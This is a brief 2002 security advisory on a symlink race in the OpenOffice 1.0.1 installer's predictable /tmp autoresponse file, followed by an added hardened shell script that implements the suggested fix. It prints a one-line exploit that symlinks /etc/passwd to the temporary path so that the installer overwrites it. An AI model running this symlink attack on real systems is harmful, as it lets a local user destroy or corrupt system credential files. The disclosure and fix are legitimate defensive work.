Vapid Labs
Larry W. Cashdollar
9/9/02

Summary: OpenOffice 1.0.1 Race condition during installation can overwrite system files.

Severity: Low

Description:
A very simple and easy to exploit race condition exists during the installation of OpenOffice. The installer writes its autoresponse file to a predictable path in the shared /tmp directory using a plain shell redirect, which follows any symlink already sitting at that path. During this window a malicious user could create a symlink in /tmp and overwrite arbitrary files.

Exploit:
As a normal user:

lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf

Where $USERNAME is the installer account name, probably root. This will result in the password file being overwritten with:

# create the proper autoresponse file
cat << EOF > /tmp/${USER}_autoresponse.conf
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oo_home
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>
[JAVA]
JavaSupport=preinstalled_or_none
EOF

Fix:
Create a directory under /tmp to work from, with restrictive permissions.

References:
http://www.openoffice.org/dev_docs/source/1.0.1/index.html

Larry W. Cashdollar
lwc@vapid.ath.cx
http://vapid.ath.cx
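The fix the advisory suggests, worked out as an added example that is not the OpenOffice installer's own code: the same autoresponse write, but performed inside a private mktemp -d directory with a noclobber redirect and a symlink check, so a pre-planted link in /tmp has nothing to redirect. The installtype, prefix and oo_home defaults are assumed values, not taken from the installer.

```shell
# Hardened variant of the installer's autoresponse write (added example, not
# the OpenOffice installer's own code). Instead of a predictable, world-writable
# path such as /tmp/${USER}_autoresponse.conf, it works inside a private
# directory created with mktemp -d (mode 0700, unpredictable name) and refuses
# to write through anything that is not a freshly created regular file.
# The variable names (installtype, prefix, oo_home) mirror the advisory; their
# default values below are stand-in assumptions.

write_autoresponse() {
    installtype="${1:-STANDARD}"
    prefix="${2:-/opt}"
    oo_home="${3:-OpenOffice.org1.0.1}"

    # Private work directory: mktemp -d creates it atomically with mode 0700,
    # so an unprivileged user cannot pre-create or symlink anything inside it.
    workdir=$(mktemp -d "${TMPDIR:-/tmp}/ooinstall.XXXXXX") || return 1
    conf="$workdir/autoresponse.conf"

    # Fail closed if something already sits at the path (file or symlink).
    if [ -e "$conf" ] || [ -L "$conf" ]; then
        echo "refusing to write: $conf already exists" >&2
        return 1
    fi

    # noclobber (set -C) makes '>' fail instead of truncating an existing target.
    (
        set -C
        cat << EOF > "$conf"
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oo_home
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>
[JAVA]
JavaSupport=preinstalled_or_none
EOF
    ) || return 1

    # Verify the result is a regular, non-symlink file before using it.
    [ -f "$conf" ] && [ ! -L "$conf" ] || return 1
    printf '%s\n' "$conf"
}

# Demonstration: write the file, show it, then remove the private directory.
conf=$(write_autoresponse STANDARD /opt OpenOffice.org1.0.1) || exit 1
cat "$conf"
rm -rf "$(dirname "$conf")"
```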